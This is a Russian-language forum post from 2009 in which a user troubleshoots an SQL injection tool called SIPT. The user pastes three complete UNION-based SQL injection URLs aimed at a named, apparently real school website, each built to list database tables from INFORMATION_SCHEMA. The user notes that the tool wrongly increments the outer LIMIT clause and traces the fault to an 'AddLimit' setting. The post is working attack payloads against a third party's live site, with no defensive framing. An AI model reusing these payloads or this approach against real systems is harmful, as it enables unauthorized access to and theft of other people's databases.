Показать сообщение отдельно

  #2  
Старый 31.05.2009, 20:49
farpost
Познающий
Регистрация: 16.05.2009
Сообщений: 42
С нами: 8941129

Репутация: 7
По умолчанию

Проблему нашёл:
SIPT делает два запроса:

Превый:

Цитата:
http://www.tauntonschool.co.uk/foundation/index.php?id=539'+UNION+SELECT+CONCAT(0x7873716C69 6E6A626567696E,(SELECT+CONCAT(TABLE_NAME,0x7873716 C696E6A64656C,TABLE_SCHEMA)+FROM+INFORMATION_SCHEM A.TABLES+LIMIT+1,1),0x7873716C696E6A656E64)+LIMIT+ 1,1--+
Результатом выполнения которого появляется 1я таблица (непонятно почему нулевая отбрасывается).

Во вотором запросе, LIMIT после ПОДзапроса должен увеличиться на 1 (то есть стать LIMIT+2,1). Но программа почему то увеличивает и LIMIT в конце всего запроса на 1.
В итоге получается такой запрос:

Цитата:
http://www.tauntonschool.co.uk/foundation/index.php?id=539'+UNION+SELECT+CONCAT(0x7873716C69 6E6A626567696E,(SELECT+CONCAT(TABLE_NAME,0x7873716 C696E6A64656C,TABLE_SCHEMA)+FROM+INFORMATION_SCHEM A.TABLES+LIMIT+2,1),0x7873716C696E6A656E64)+LIMIT+2,1--+
Который само собой ничего не выводит.

Второй запрос должен быть таким:

Цитата:
http://www.tauntonschool.co.uk/foundation/index.php?id=539'+UNION+SELECT+CONCAT(0x7873716C69 6E6A626567696E,(SELECT+CONCAT(TABLE_NAME,0x7873716 C696E6A64656C,TABLE_SCHEMA)+FROM+INFORMATION_SCHEM A.TABLES+LIMIT+2,1),0x7873716C696E6A656E64)+LIMIT+1,1--+

Это у меня сборка такая косячная или я чего то не догоняю???

_____________________________


И наконец то нашёл косяк в том что стоит галка AddLimit.


То что изменяется limit вконце помоему всё равно косяк большой. Хорошо бы поправить. Если не понятно, почему я считаю это косяком, могу разъяснить.

Последний раз редактировалось farpost; 31.05.2009 в 21:21..
 
Ответить с цитированием